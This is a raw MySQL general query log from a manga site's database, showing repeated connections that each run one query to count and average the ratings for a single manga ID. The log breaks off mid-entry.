Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330656874 Quit 330656875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330656875 Quit 330656876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330656876 Quit 330656877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330656877 Quit 330656878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330656878 Quit 330656879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330656879 Quit 330656880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330656880 Quit 330656881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330656881 Quit 330656882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330656882 Quit 330656883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330656883 Quit 330656884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330656884 Quit 330656885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330656885 Quit 330656886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330656886 Quit 330656887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330656887 Quit 330656888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330656888 Quit 330656889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330656889 Quit 330656890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330656890 Quit 330656891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330656891 Quit 330656892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330656892 Quit 330656893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330656893 Quit 330656894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330656894 Quit 330656895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330656895 Quit 330656896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330656896 Quit 330656897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330656897 Quit 330656898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330656898 Quit 330656899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330656899 Quit 330656900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330656900 Quit 330656901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330656901 Quit 330656902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330656902 Quit 330656903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330656903 Quit 330656904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330656904 Quit 330656905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330656905 Quit 330656906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330656906 Quit 330656907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330656907 Quit 330656908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330656908 Quit 330656909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330656909 Quit 330656910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330656910 Quit 330656911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330656911 Quit 330656912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330656912 Quit 330656913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330656913 Quit 330656914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330656914 Quit 330656915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330656915 Quit 330656916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330656916 Quit 330656917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330656917 Quit 330656918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330656918 Quit 330656919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330656919 Quit 330656920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330656920 Quit 330656921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330656921 Quit 330656922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330656922 Quit 330656923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330656923 Quit 330656924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330656924 Quit 330656925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330656925 Quit 330656926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330656926 Quit 330656927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330656927 Quit 330656928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330656928 Quit 330656929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330656929 Quit 330656930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330656930 Quit 330656931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330656931 Quit 330656932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330656932 Quit 330656933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330656933 Quit 330656934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330656934 Quit 330656935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330656935 Quit 330656936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330656936 Quit 330656937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330656937 Quit 330656938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330656938 Quit 330656939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330656939 Quit 330656940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330656940 Quit 330656941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330656941 Quit 330656942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330656942 Quit 330656943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330656943 Quit 330656944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330656944 Quit 330656945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330656945 Quit 330656946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330656946 Quit 330656947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330656947 Quit 330656948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330656948 Quit 330656949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330656949 Quit 330656950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330656950 Quit 330656951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330656951 Quit 330656952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330656952 Quit 330656953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330656953 Quit 330656954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330656954 Quit 330656955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330656955 Quit 330656956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330656956 Quit 330656957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330656957 Quit 330656958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330656958 Quit 330656959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330656959 Quit 330656960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330656960 Quit 330656961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330656961 Quit 330656962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330656962 Quit 330656963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330656963 Quit 330656964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330656964 Quit 330656965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330656965 Quit 330656966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330656966 Quit 330656967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330656967 Quit 330656968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330656968 Quit 330656969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330656969 Quit 330656970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330656970 Quit 330656971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330656971 Quit 330656972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330656972 Quit 330656973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330656973 Quit 330656974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330656974 Quit 330656975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330656975 Quit 330656976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330656976 Quit 330656977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330656977 Quit 330656978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330656978 Quit 330656979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330656979 Quit 330656980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330656980 Quit 330656981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330656981 Quit 330656982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330656982 Quit 330656983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330656983 Quit 330656984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330656984 Quit 330656985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330656985 Quit 330656986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330656986 Quit 330656987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330656987 Quit 330656988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330656988 Quit 330656989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330656989 Quit 330656990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330656990 Quit 330656991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330656991 Quit 330656992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330656992 Quit 330656993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330656993 Quit 330656994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330656994 Quit 330656995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330656995 Quit 330656996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330656996 Quit 330656997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330656997 Quit 330656998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330656998 Quit 330656999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330656999 Quit 330657000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330657000 Quit 330657001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330657001 Quit 330657002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330657002 Quit 330657003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330657003 Quit 330657004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330657004 Quit 330657005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330657005 Quit 330657006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330657006 Quit 330657007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330657007 Quit 330657008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330657008 Quit 330657009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330657009 Quit 330657010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330657010 Quit 330657011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330657011 Quit 330657012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330657012 Quit 330657013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330657013 Quit 330657014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330657014 Quit 330657015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330657015 Quit 330657016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330657016 Quit 330657017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330657017 Quit 330657018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330657018 Quit 330657019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330657019 Quit 330657020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330657020 Quit 330657021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330657021 Quit 330657022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330657022 Quit 330657023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330657023 Quit 330657024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330657024 Quit 330657025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330657025 Quit 330657026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330657026 Quit 330657027 Connect 